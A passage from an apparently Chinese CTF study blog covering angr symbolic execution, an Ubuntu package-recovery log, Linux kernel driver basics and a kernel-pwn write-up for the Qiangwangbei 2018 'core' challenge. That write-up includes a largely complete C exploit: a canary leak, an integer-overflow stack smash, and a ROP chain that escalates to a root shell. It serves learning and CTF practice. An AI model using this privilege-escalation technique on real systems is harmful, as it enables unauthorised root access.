sys.stdout.buffer.write(basic_symbolic_execution())

# You should be able to run this script and pipe its output to fauxware and
# fauxware will authenticate you.

其中在创建Project时有这么一个点要注意一下

auto_load_libs 设置是否自动载入依赖的库,如果设置为 True 的话会自动载入依赖的库,然后分析到库函数调用时也会进入库函数,这样会增加分析的工作量,也有能会跑挂

eg1的第二个solve代码:

1
2
3
4
5
6
7
8
proj = angr.Project('eg1')
state = proj.factory.entry_state()
while True:
succ = state.step() # 一次step记录一次执行分支的state
if len(succ.successors) == 2:#这个代码的意思也是在产生两个分支时停下,打印输出用上面代码的注释那段就好
break
state = succ.successors[0]
state1, state2 = succ.successors

这里step函数的返回值是 “an object called SimSuccessors

当然这里写法还有很多很多,具体强烈推荐参考官方文档,还有官方API文档,本博客在文末板块会尽量更新一下CTF中碰到的用法,限于英语原因很多原文中的core conception可能本人理解会有误

博主写到这里暂时感觉最好用的函数是这几个:

1
2
3
4
5
simgr.step()#这个就是上面代码中的,一个分支一个分支的记录也好像挺好用2333

sm.explore(find=0x400591) # 这个是直接设置符号执行遍历到哪个代码块停下来,很好用

simgr.explore(find=lambda s: b"Congrats" in s.posix.dumps(1))#这个是用标准输出中输出了什么来判断,直接用起来也很无脑

此道逆向题的angr解法

中间这些state操作建议先参考文末的设置&变量用法

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
import angr
import claripy

p = angr.Project("./funre", load_options={"auto_load_libs": False})
f = p.factory
state = f.entry_state(addr=0x400605) # 设置state开始运行时运行到的地址
flag = claripy.BVS("flag", 8*32) #这里设置了一个flag VBS,长度是8*32bit
state.memory.store(0x603055+0x300+5, flag) #因为程序没有输入,所以直接把字符串设置到内存
state.regs.rdx = 0x603055+0x300
state.regs.rdi = 0x603055+0x300+5 # 然后设置两个寄存器

sm = p.factory.simulation_manager(state) # 准备从该state开始遍历执行路径

print("[+] init ok")

sm.explore(find=0x401DAE) # 遍历到成功的地址
if sm.found:
print("[+] found!")
x = sm.found[0].solver.eval(flag, cast_to=bytes)
print(x)

我跑下来大概只用了一两分钟时间不到?不过貌似还能加速,这里也介绍一下加速要用到的东西

加速模块安装


注意这里安装的方法本人安装失败了…介于之前装崩python的原因就暂时不继续探究原因了,只不过好像是一个什么版本的问题,具体参考这篇文章末尾

  1. sudo apt install pypy
  2. wget https://bootstrap.pypa.io/get-pip.py
  3. sudo pypy get-pip.py

第二种方法就是在init_state时加上add_options=angr.options.unicorn

angr中碰到的一些设置&变量用法

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
################## 设置操作
state.solver.BVV(1, 64) # 设置一个Bitvector 第一个参数是初始值 第二个参数是长度 也可以用下面简单的写法

args = claripy.BVS("args", 8 * 16) # 用claripy包设置一个符号变量(十六进制字符串)

weird_nine.zero_extend(64 - 27) # Bitvector长度转换 这里示意是从27->64

p.hook(addr=0x08048485, hook=hook_demo, length=2) # 设置一个hook,address是执行到什么地方之后hook,hook_demo代表一个函数,length是hook_demo执行之后需要跳过的指令长度
#具体的hook操作在以后会慢慢写到


################## state操作
state.regs.X # X代表要操作的寄存器,这里可以设置寄存器的值,此时寄存器的类型是一个Bitvector

hex(state.se.eval(state.regs.X)) # 想要获取寄存器Bitvector的int值需要使用eval函数来获取 BVS同理

state.mem[state.regs.rsp].qword # 获取某个寄存器指向的内存 可以看到这里mem的参数也是BVV
# 但是返回值是类似这种:<uint64_t <BV64 0xdeadbeefdeadbeef> at 0x7fffffffffeff78>
state.se.eval(xxx.qword.resolved) # 通过eval拿到此地址对应类型的确切值

state.memory.store(state.regs.rsp,data)
state.memory.load(state.regs.rsp, 0x40) # 这里可以直接通过地址来进行存储不一定要寄存器,满足BVV的操作就行

state.posix.dumps(0) # dump运行时标准输入


################# SimulationManager操作
sm = p.factory.simgr(state)
sm.explore(find=0x400591)
st = sm.found[0] # 通过found[0]拿到的是此时的state,可以再通过上面state的操作dump标准输入

st.se.eval(args,cast_to=str) # 当然如果用到了 BVS 的话就可以使用cast_to来转成普通字符串了

参考文章:https://www.secpulse.com/archives/83197.html

记录一次apt包误删后的恢复

愚人节的第一个惊喜???

昨天本来是换ubuntu16 py3环境的,先删掉了自己原生的py3,可惜脑残从网上复制命令的时候可能有一句autoremove之类的东西?我所有ubuntu原生与py3有关的apt包怕是全被删完…..当时删了600多M没在意,然后用的时候只是发现终端坏了,gedit没了,然后在终端还仅存的时候装上了gnome-terminal和gedit,现在想想都后怕,要是当时没装上还得在那个黑洞洞的Xterm里面重装

然后今天来操作的时候偶然一个什么操作触发了崩盘

image-20200401161311509

图形化界面几乎是崩了一半了,窗口也拖不动只有命令行和这个可怜的桌面上几个文件夹和我打交道(幸好终端滚动条还能用),开机可以正常开,不过此时可以看到网络是断开的:

image-20200401162339042

第一步:终端

发现Ctrl+Alt+T没反应了,不清楚具体什么原因,但是右键桌面幸好还是可以开启terminal

第二步:网络

首先我面临的问题不是命令使用不了了,正常命令我都可以使用,但是我需要的是用apt把这些包全都装回来

image-20200401162540191

直接ifconfig看的话就是这样的,下面是我的解决方案

sudo /sbin/dhclient(在这条命令之前好像还尝试启动了一些服务之类的,由于是操作到一半来记录的所以前面几条可能就没有了,不过这条是最有效的,因为使用了之后我直接就可以ping通DNS和baidu了,重启之后也是和上面显示的一样,但是直接使用这条命令的话就可以瞬间通网,神奇)

sudo service network-manager start

sudo gedit /etc/NetworkManager/NetworkManager.conf 把最后一行的false改成true,这下开机的时候就会自动有网了

第三步:开始琢磨apt包

桌面apt包

还是先sudo apt update && sudo apt upgrade

之前换源的文件倒是没事,照样可用,但是upgrade的时候有内容不能fetch,所以先进行下面的操作

sudo apt install compiz

sudo apt install unity

sudo apt install gdebi

sudo apt install ubuntu-desktop

sudo apt-get install --reinstall ubuntu-desktop(这个reinstall是照着敲的,也没多想)

这里还参考了知乎上的这篇回答

然后桌面系统就恢复正常了

重新启动一切正常,Ctrl+Alt+T也可以使用了

其他apt包(可能会长期更新)

sudo apt install libxslt-dev
sudo apt install libjpeg-dev
sudo apt install python-pip

后续

之后因为系统报错所以我还执行了这两条命令,虽然不知道有没有用

sudo service apport restart

sudo systemctl restart apport

kernel入门

编译驱动程序

hello.c


/usr/src/linux-headers-4.4.0-174/ –> 该内核源码目录
/usr/src/linux-headers-4.4.0-174-generic/ –> 该内核编译好的源码目录


切到/usr/src/linux-headers-4.4.0-174-generic路径

然后make menuconfig,我照着大致修改了一下有些没有开启的东西(乱开一通系列…)

切回我们第一个想编译的程序路径

第一个驱动程序hello.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
#include <linux/init.h>
#include <linux/module.h>
MODULE_LICENSE("Dual BSD/GPL");

static int hello_init(void)
{
printk(KERN_ALERT "Hello, world\n");
return 0;

}

static void hello_exit(void)
{
printk(KERN_ALERT "Goodbye, cruel world\n");

}

module_init(hello_init);
module_exit(hello_exit);//module_exit会将这个函数

Makefile

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
# To build modules outside of the kernel tree, we run "make"
# in the kernel source tree; the Makefile these then includes this
# Makefile once again.
# This conditional selects whether we are being included from the
# kernel Makefile or not.
ifeq ($(KERNELRELEASE),)

# Assume the source tree is where the running kernel was built
# You should set KERNELDIR in the environment if it's elsewhere
KERNELDIR ?= /lib/modules/$(shell uname -r)/build
# The current directory is passed to sub-makes as argument
PWD := $(shell pwd)

modules:
$(MAKE) -C $(KERNELDIR) M=$(PWD) modules

modules_install:
$(MAKE) -C $(KERNELDIR) M=$(PWD) modules_install

clean:
rm -rf *.o *~ core .depend .*.cmd *.ko *.mod.c .tmp_versions

.PHONY: modules modules_install clean

else
# called from kernel build system: just declare what our modules are
obj-m := hello.o
endif

接着执行make

编译好了之后就可以在目录下看到这个文件(kenel object缩写)

1584795814785

使用sudo insmod hello.ko即可加载该驱动程序(模块) //此时会调用module_init设置的设备初始化函数

lsmod |grep hello可以看到驱动被成功加载

tail /var/log/syslog可以看到最后一行是程序的init加载就输出的内容

rmmod移除模块 //此时会调用module_exit设置的设备退出函数

tail /var/log/syslog也可以看到程序fini输出的内容了

IDA界面如下

1584962662551

其中printk似乎会在字符串前面加上一个1,左边就可以看到我们的驱动有init和exit两个函数了

在dev下增加驱动文件

参考来自:https://paper.seebug.org/779/#_2

这段代码很长,不过我主要只是理解了其中一个概念:struct file_operations scull_fops是啥

当然我当时编译的时候报错了,下面这段代码要加上一个这个,还有把raw_copy_...函数前面的raw_去掉

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h> /* printk() */
#include <linux/slab.h> /* kmalloc() */
#include <linux/fs.h> /* everything... */
#include <linux/errno.h> /* error codes */
#include <linux/types.h> /* size_t */
#include <linux/fcntl.h> /* O_ACCMODE */
#include <linux/cdev.h>
#include <asm/uaccess.h> /* copy_*_user */

MODULE_LICENSE("Dual BSD/GPL");
MODULE_AUTHOR("Hcamael");

int scull_major = 0;
int scull_minor = 0;
int scull_nr_devs = 4;
int scull_quantum = 4000;
int scull_qset = 1000;

struct scull_qset {
void **data;
struct scull_qset *next;
};

struct scull_dev {
struct scull_qset *data; /* Pointer to first quantum set. */
int quantum; /* The current quantum size. */
int qset; /* The current array size. */
unsigned long size; /* Amount of data stored here. */
unsigned int access_key; /* Used by sculluid and scullpriv. */
struct mutex mutex; /* Mutual exclusion semaphore. */
struct cdev cdev; /* Char device structure. */
};

struct scull_dev *scull_devices; /* allocated in scull_init_module */

/*
* Follow the list.
*/
struct scull_qset *scull_follow(struct scull_dev *dev, int n)
{
struct scull_qset *qs = dev->data;

/* Allocate the first qset explicitly if need be. */
if (! qs) {
qs = dev->data = kmalloc(sizeof(struct scull_qset), GFP_KERNEL);
if (qs == NULL)
return NULL;
memset(qs, 0, sizeof(struct scull_qset));
}

/* Then follow the list. */
while (n--) {
if (!qs->next) {
qs->next = kmalloc(sizeof(struct scull_qset), GFP_KERNEL);
if (qs->next == NULL)
return NULL;
memset(qs->next, 0, sizeof(struct scull_qset));
}
qs = qs->next;
continue;
}
return qs;
}

/*
* Data management: read and write.
*/

ssize_t scull_read(struct file *filp, char __user *buf, size_t count,
loff_t *f_pos)
{
struct scull_dev *dev = filp->private_data;
struct scull_qset *dptr; /* the first listitem */
int quantum = dev->quantum, qset = dev->qset;
int itemsize = quantum * qset; /* how many bytes in the listitem */
int item, s_pos, q_pos, rest;
ssize_t retval = 0;

if (mutex_lock_interruptible(&dev->mutex))
return -ERESTARTSYS;
if (*f_pos >= dev->size)
goto out;
if (*f_pos + count > dev->size)
count = dev->size - *f_pos;

/* Find listitem, qset index, and offset in the quantum */
item = (long)*f_pos / itemsize;
rest = (long)*f_pos % itemsize;
s_pos = rest / quantum; q_pos = rest % quantum;

/* follow the list up to the right position (defined elsewhere) */
dptr = scull_follow(dev, item);

if (dptr == NULL || !dptr->data || ! dptr->data[s_pos])
goto out; /* don't fill holes */

/* read only up to the end of this quantum */
if (count > quantum - q_pos)
count = quantum - q_pos;

if (raw_copy_to_user(buf, dptr->data[s_pos] + q_pos, count)) {
retval = -EFAULT;
goto out;
}
*f_pos += count;
retval = count;

out:
mutex_unlock(&dev->mutex);
return retval;
}

ssize_t scull_write(struct file *filp, const char __user *buf, size_t count,
loff_t *f_pos)
{
struct scull_dev *dev = filp->private_data;
struct scull_qset *dptr;
int quantum = dev->quantum, qset = dev->qset;
int itemsize = quantum * qset;
int item, s_pos, q_pos, rest;
ssize_t retval = -ENOMEM; /* Value used in "goto out" statements. */

if (mutex_lock_interruptible(&dev->mutex))
return -ERESTARTSYS;

/* Find the list item, qset index, and offset in the quantum. */
item = (long)*f_pos / itemsize;
rest = (long)*f_pos % itemsize;
s_pos = rest / quantum;
q_pos = rest % quantum;

/* Follow the list up to the right position. */
dptr = scull_follow(dev, item);
if (dptr == NULL)
goto out;
if (!dptr->data) {
dptr->data = kmalloc(qset * sizeof(char *), GFP_KERNEL);
if (!dptr->data)
goto out;
memset(dptr->data, 0, qset * sizeof(char *));
}
if (!dptr->data[s_pos]) {
dptr->data[s_pos] = kmalloc(quantum, GFP_KERNEL);
if (!dptr->data[s_pos])
goto out;
}
/* Write only up to the end of this quantum. */
if (count > quantum - q_pos)
count = quantum - q_pos;

if (raw_copy_from_user(dptr->data[s_pos]+q_pos, buf, count)) {
retval = -EFAULT;
goto out;
}
*f_pos += count;
retval = count;

/* Update the size. */
if (dev->size < *f_pos)
dev->size = *f_pos;

out:
mutex_unlock(&dev->mutex);
return retval;
}

/* Beginning of the scull device implementation. */

/*
* Empty out the scull device; must be called with the device
* mutex held.
*/
int scull_trim(struct scull_dev *dev)
{
struct scull_qset *next, *dptr;
int qset = dev->qset; /* "dev" is not-null */
int i;

for (dptr = dev->data; dptr; dptr = next) { /* all the list items */
if (dptr->data) {
for (i = 0; i < qset; i++)
kfree(dptr->data[i]);
kfree(dptr->data);
dptr->data = NULL;
}
next = dptr->next;
kfree(dptr);
}
dev->size = 0;
dev->quantum = scull_quantum;
dev->qset = scull_qset;
dev->data = NULL;
return 0;
}

int scull_release(struct inode *inode, struct file *filp)
{
printk(KERN_DEBUG "process %i (%s) success release minor(%u) file\n", current->pid, current->comm, iminor(inode));
return 0;
}

/*
* Open and close
*/

int scull_open(struct inode *inode, struct file *filp)
{
struct scull_dev *dev; /* device information */

dev = container_of(inode->i_cdev, struct scull_dev, cdev);
filp->private_data = dev; /* for other methods */

/* If the device was opened write-only, trim it to a length of 0. */
if ( (filp->f_flags & O_ACCMODE) == O_WRONLY) {
if (mutex_lock_interruptible(&dev->mutex))
return -ERESTARTSYS;
scull_trim(dev); /* Ignore errors. */
mutex_unlock(&dev->mutex);
}
printk(KERN_DEBUG "process %i (%s) success open minor(%u) file\n", current->pid, current->comm, iminor(inode));
return 0;
}

/*
* The "extended" operations -- only seek.
*/

loff_t scull_llseek(struct file *filp, loff_t off, int whence)
{
struct scull_dev *dev = filp->private_data;
loff_t newpos;

switch(whence) {
case 0: /* SEEK_SET */
newpos = off;
break;

case 1: /* SEEK_CUR */
newpos = filp->f_pos + off;
break;

case 2: /* SEEK_END */
newpos = dev->size + off;
break;

default: /* can't happen */
return -EINVAL;
}
if (newpos < 0)
return -EINVAL;
filp->f_pos = newpos;
return newpos;
}

struct file_operations scull_fops = {
.owner = THIS_MODULE,
.llseek = scull_llseek,
.read = scull_read,
.write = scull_write,
// .unlocked_ioctl = scull_ioctl,
.open = scull_open,
.release = scull_release,
};

/*
* Set up the char_dev structure for this device.
*/
static void scull_setup_cdev(struct scull_dev *dev, int index)
{
int err, devno = MKDEV(scull_major, scull_minor + index);

cdev_init(&dev->cdev, &scull_fops);
dev->cdev.owner = THIS_MODULE;
dev->cdev.ops = &scull_fops;
err = cdev_add (&dev->cdev, devno, 1);
/* Fail gracefully if need be. */
if (err)
printk(KERN_NOTICE "Error %d adding scull%d", err, index);
else
printk(KERN_INFO "scull: %d add success\n", index);
}


void scull_cleanup_module(void)
{
int i;
dev_t devno = MKDEV(scull_major, scull_minor);

/* Get rid of our char dev entries. */
if (scull_devices) {
for (i = 0; i < scull_nr_devs; i++) {
scull_trim(scull_devices + i);
cdev_del(&scull_devices[i].cdev);
}
kfree(scull_devices);
}

/* cleanup_module is never called if registering failed. */
unregister_chrdev_region(devno, scull_nr_devs);
printk(KERN_INFO "scull: cleanup success\n");
}


int scull_init_module(void)
{
int result, i;
dev_t dev = 0;

/*
* Get a range of minor numbers to work with, asking for a dynamic major
* unless directed otherwise at load time.
*/
if (scull_major) {
dev = MKDEV(scull_major, scull_minor);
result = register_chrdev_region(dev, scull_nr_devs, "scull");
} else {
result = alloc_chrdev_region(&dev, scull_minor, scull_nr_devs, "scull");
scull_major = MAJOR(dev);
}
if (result < 0) {
printk(KERN_WARNING "scull: can't get major %d\n", scull_major);
return result;
} else {
printk(KERN_INFO "scull: get major %d success\n", scull_major);
}

/*
* Allocate the devices. This must be dynamic as the device number can
* be specified at load time.
*/
scull_devices = kmalloc(scull_nr_devs * sizeof(struct scull_dev), GFP_KERNEL);
if (!scull_devices) {
result = -ENOMEM;
goto fail;
}
memset(scull_devices, 0, scull_nr_devs * sizeof(struct scull_dev));

/* Initialize each device. */
for (i = 0; i < scull_nr_devs; i++) {
scull_devices[i].quantum = scull_quantum;
scull_devices[i].qset = scull_qset;
mutex_init(&scull_devices[i].mutex);
scull_setup_cdev(&scull_devices[i], i);
}

return 0; /* succeed */

fail:
scull_cleanup_module();
return result;
}

module_init(scull_init_module);
module_exit(scull_cleanup_module);

makefile:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

ifneq ($(KERNELRELEASE),)

obj-m := file_operations.o

else

KERN_DIR ?= /usr/src/linux-headers-$(shell uname -r)/
PWD := $(shell pwd)

default:

$(MAKE) -C $(KERN_DIR) M=$(PWD) modules

endif


clean:
rm -rf *.o *~ core .depend .*.cmd *.ko *.mod.c .tmp_versions

IDA界面如下

1584963141639

可以看到这边是一系列的对应的操作函数


驱动提供的接口是/dev/xxx,在Linux下Everything is File,所以对驱动设备的操作其实就是对文件的操作,所以一个驱动就是用来定义打开/读/写/……一个/dev/xxx将会发生啥,驱动提供的API(fops中指定的)也就是一系列的文件操作

struct file_operations scull_fops结构体中实现了的函数就会静态初始化上函数地址,而未实现的函数,值为NULL

结构体中实现的几个call,冒号右侧的函数名是由开发者自己起的,在驱动程序载入内核后,其他用户程序程序就可以借助文件方式像进行系统调用一样调用这些函数实现所需功能。

这里是一些已知的常见对应操作:

1
2
3
4
5
6
Events		User functions		Kernel functions
Load insmod module_init()
Open fopen file_operations: open
Close fread file_operations: read
Write fwrite file_operations: write
Close fclose file_operations: release

这里还有一些知识点,比如驱动分类,主次编号,什么的,我写的这些主要也是参考了这篇文章


之后insmod,此时虽然驱动已经加载成功了(dmesg可以看到驱动主编号是246,分别用四个次编号标记了4个设备,4个是怎么来的看上面代码就知道了)

1584964191239

但是此时并不会在/dev目录下创建设备文件,需要我们手动使用mknod进行设备链接

1584964631604

此时还可以指定设备类型,然后删除就直接使用rm就好了

这里记一下命令:
dmesg可以查看syslog
cat /proc/devices 中查看设备的类型(左边是主设备号,右边的是设备名)
mknod 设备名 设备类型(字符:c,块:b) 主设备号 从设备号

rmmod之后dmesg还可以看到一条scull: cleanup success

kernel pwn基础知识

这篇文章,中有这么一句话

如果驱动在init中执行了proc_create(“core”, 0x1B6LL, 0LL, &core_fops),文件名是“core”,而且在回调中实现了ioctl,那么其他用户程序就可以先fopen这个core获取文件指针fd,然后执行ioctl(fd,<参数>,<参数>)来进行具体操作,其他的fop中的回调接口函数也类似。

然后我就去看了ioctl是什么:


ioctl(input/output control)是一个专用于设备输入输出操作的系统调用,该调用传入一个跟设备有关的请求码,系统调用的功能完全取决于请求码

ioctl是设备驱动程序中对设备的I/O通道进行管理的函数。所谓对I/O通道进行管理,就是对设备的一些特性进行控制,例如串口的传输波特率、马达的转速等等。它的调用个数如下:

1
int ioctl(int fd, ind cmd, …);

其中fd是用户程序打开设备时使用open函数返回的文件标示符,cmd是用户程序对设备的控制命令,至于后面的省略号,那是一些补充参数,一般最多一个,这个参数的有无和cmd的意义相关。

ioctl函数是文件结构中的一个属性分量,就是说如果你的驱动程序提供了对ioctl的支持,用户就可以在用户程序中使用ioctl函数来控制设备的I/O通道。


差不多就是我们与驱动设备交互的一个函数吧,一般前两个参数是fd还有控制码,然后还有一句话

一个进程的在用户态和内核态是对应了完全不搭边儿的两个栈的,用户栈和内核栈既然相互隔离,在系统调用或者调用驱动、内核模块函数时就不能通过栈传参了,而要通过寄存器,像拷贝这样的操作也要借助具体的函数:copy_to_user/copy_from_user

就是说内核栈和用户栈是相互隔离的,然后通过寄存器传参

然后进入kernel态一般有如下情况:

  1. 系统调用

  2. 产生异常

  3. 外设产生中断

    等等

至于提权的话就是这些了:由于这些内核模块运行时的权限是root权限,因此我们将有机会借此拿到root权限的shell,流程上就是C程序exp调用内核模块利用其漏洞提权,只是提权后要“着陆”回用户态拿shell。提权代码是commit_creds(prepare_kernel_cred(0))

进入kernel态进行的操作

保存用户态的各个寄存器,以及执行到代码的位置

从kernel态返回用户态进行的操作

执行swapgs 和 iret 指令

一般的攻击思路

1584965699729


记一下命令:

查看所开保护cat /proc/cpuinfo
查看内核堆块 cat /proc/slabinfo
查看prepare_kernel_cred和commit_creds地址
grep prepare_kernel_cred /proc/kallsyms
grep commit_creds /proc/kallsyms


实操linux kernel ROP

强网杯2018-core

下载下来压缩文件之后看到有这几个文件:

1584966164347

其中对应的文件意思如下(来自星盟公开课的截图):

1584966068272

其中bzImage是打包的内核代码,可以用来寻找gadget

这里写一下师傅们的注意事项:

注意,vmlinux是未经压缩的,然而在core.cpio里面也有一个vmlinux,里面那个是起系统后真正的vmlinux,按理说这俩应该是一样的,单独拿出来是为了你方便分析,但是笔者亲测的时候发现这俩竟然不一样,可能是下载的时候弄错了?如果读者也遇到相同情况,不要用外面那个,一定要用core.cpio里面那个

start.sh中有以下内容

1
2
3
4
5
6
7
8
qemu-system-x86_64 \
-m 64M \
-kernel ./bzImage \
-initrd ./core.cpio \
-append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet kaslr" \ #这里开启了kaslr保护
-s \
-netdev user,id=t0, -device e1000,netdev=t0,id=nic0 \
-nographic \

我们可以自己再做一份rootstart.sh还有一个root.cpio,主要是用来调试

其中在sh文件最后加上gdb调试的选项:-gdb tcp::1234
还有比如关掉kaslr

新制作的root.cpio中则需要修改以下几点:

  1. cpio包中的init文件,里面有一行poweroff,是到时间自动关机的命令,可以取消掉
  2. 同样是init文件,setsid /bin/cttyhack setuidgid 1000 /bin/sh改成0000,这样就可以以root身份启动了

ps:这里就是整个系统的配置,如果发现有什么配置有问题的话说不定就非预期解了….然后系统初始化操作没有写在这里的话看看/etc/init.d/rcS,有时候初始化配置会写在这里

新制作的rootstart.sh就是这样:

1
2
3
4
5
6
7
8
9
qemu-system-x86_64 \
-m 64M \
-kernel ./bzImage \
-initrd ./root.cpio \ #用新的root.cpio启动
-append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet nokaslr" \ #nokslr
-s \
-netdev user,id=t0, -device e1000,netdev=t0,id=nic0 \
-nographic \
-gdb tcp::1234 # gdb 调试端口

启动踩坑

然后启动….

但是启动的时候我疯狂踩坑,被坑了很久很久

那个-s就是代表了-gdb tcp::1234所以并不需要这一行….

然后qemu第一个报错是:Initramfs unpacking failed: incorrect cpio method used: use -H newc option,因为我在之前尝试用

cpio -idmv < core.cpio解包的时候就发现有点问题,所以我就用图形化界面的解包工具把cpio解包了之后再用find . | cpio -o --format=newc > ./root.cpio,把它重新打包了一下

接着发现还是起不起来,找了师傅们的博客,就又把上面.sh中的 -m 64改成了 -m 128

还是起不来(跪,报错:Kernel panic - not syncing: Out of memory and no killable processes…

本来以为是自己虚拟机的问题,先跑过去激活了之前忘记激活的swap分区…然后各种操作,最后….

找了半天原因,…..发现原来是师傅们的128也不行,改成 -m 256M跑起来了,也差不多懂了 qemu 的-m到底是干嘛的……

程序分析

啊….总算可以开始正式写题了

这里记一下一般kernel pwn的步骤吧,就照着师傅们写的来

第一步

先看init函数和fop结构体

1584974897309

可见驱动文件创建于proc下的core文件,在我们的用户程序中对ioctl等驱动函数的访问就是通过core文件来进行的

1584974842581

可以看到fop回调中只实现了如图三个回调,因此,虽然ida左侧的函数列表中还有core_read、core_copy_func但是这俩是驱动内部的函数,是不能由用户程序来调用的

ioctl

1584974968510

根据请求码执行相应的函数

core_read

1584975417499

这里的意思大概就是打印了off还有ioctl第三个参数的值

然后进行了一个类似memset的操作,接着从栈buffer的off偏移位置开始拷贝给用户64字节的数据

显然off如果可控的话就leak了canary或者其他一些东西

然而off在我们传入的控制码为0x6677889C时,就可以直接赋值为ioctl的第三个参数

core_copy_func

1584975853772

这个函数的意思就是ioctl的第三个参数如果大于0x3F时,就会detect到溢出然后直接返回,否则直接从name全局变量中拷入p3个字节的数据到v3这个栈buffer中,但是在memcpy时p3被转换成了unsigned __int16,所以我们在p3为负数时可以实现一个比较大的overflow

core_write

再来看注册过的write函数

1584976661640

user的buffer就是通过这个函数传给name,不过这里看不到v5的赋值

1584976821281

在汇编里面可以看到这个赋值是通过rsi来进行的

所以流程就是这样:

  1. 设置off值
  2. 泄露canary
  3. 把rop链写进name变量
  4. 利用无符号整型漏洞进行栈溢出写rop链

ret2user&exp

1584977702149

注意init脚本中拷贝了一份内核函数表到/tmp/kallsyms,可以供我们直接读到内核函数地址,此时读到的符号在开启kaslr下就是读到的kaslr后的地址,可以减去没有开kaslr时的偏移

对于kernel pwn的exp的话先看别人是怎么写的吧,然后自己再慢慢学着写,模板肯定都是差不多的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/ioctl.h>
void save_status();//保存用户状态时寄存器
size_t find_symbols();//查看/tmp/kallsyms找到kaslr下函数的地址
void getpwn();//跑/bin/sh

void core_copy_func(int fd,long long int size);
void core_read(int fd,char* buf);//这两个就是通过ioctl的操作码来和驱动设备交互了

size_t vmlinux_base = 0;
size_t commit_creds = 0, prepare_kernel_cred = 0;
size_t raw_vmlinux_base = 0xffffffff81000000;
size_t user_cs, user_ss, user_rflags, user_sp;

int main()
{
save_status();
int fd = open("/proc/core", 2);
if(fd<0)
{
puts("[*] open /proc/core error");
exit(0);
}
find_symbols();
size_t offset=vmlinux_base-raw_vmlinux_base;//raw_vmlinux_base是我们没有开启kaslr时的内核加载基址,这里就是算出aslr的offset
setoff(fd,0x40);//将off的值 设置成canary对应的偏移
char buf[0x40]={0};
core_read(fd,buf);//把canary读到这个buf数组里面去

size_t canary=((size_t *)buf)[0];
printf("[*] canary :%p\n", canary);
size_t rop[0x1000];
int i;
for(i=0;i<10;i++)
{
rop[i]=canary;
}
rop[i++] = 0xffffffff81000b2f + offset; // pop rdi; ret
rop[i++] = 0;
rop[i++] = prepare_kernel_cred; // prepare_kernel_cred(0)

rop[i++] = 0xffffffff810a0f49 + offset; // pop rdx; ret
rop[i++] = 0xffffffff81021e53 + offset; // pop rcx; ret rdx=&'pop rcx; ret'
rop[i++] = 0xffffffff8101aa6a + offset; // mov rdi, rax; call rdx; prepare_kernel_cred(0)返回值放到rdi
//call rdx:pop rcx 把call保存的rip放到rcx去,这一步没什么意义只是为了直接ret到下一条
rop[i++] = commit_creds;//执行commit_creds(rdi)

rop[i++] = 0xffffffff81a012da + offset; // swapgs; popfq; ret
rop[i++] = 0;//为了gadget中的popfq

rop[i++] = 0xffffffff81050ac2 + offset; // iretq; ret; 此时之前保存的用户态数据就有作用了
rop[i++] = (size_t )getpwn;
rop[i++] = user_cs;
rop[i++] = user_rflags;
rop[i++] = user_sp;
rop[i++] = user_ss;
write(fd,rop,0x800);//先用write写到name中,因为此设备的write是注册过的,所以可以直接用write写进去
core_copy_func(fd,0xffffffffffff0000 | (0x100));//然后开始core_copy实现栈溢出


return 0;
}
void core_copy_func(int fd,long long int size)
{
puts("[*] going core_copy_func");
ioctl(fd,0x6677889A,size);
}
void getpwn()
{
if(!getuid())
{
system("/bin/sh");

}
else
{
puts("[*] get shell error");
}
exit(0);

}
void core_read(int fd,char* buf)
{
puts("[*] going core_read");
ioctl(fd,0x6677889B,buf);
}
void setoff(int fd,int size)
{
puts("[*] going setoff");
ioctl(fd,0x6677889C,size);
}
void save_status()
{
__asm__("mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
);
puts("[*]status has been saved.");
}
size_t find_symbols()
{
FILE* kallsyms_fd = fopen("/tmp/kallsyms", "r");
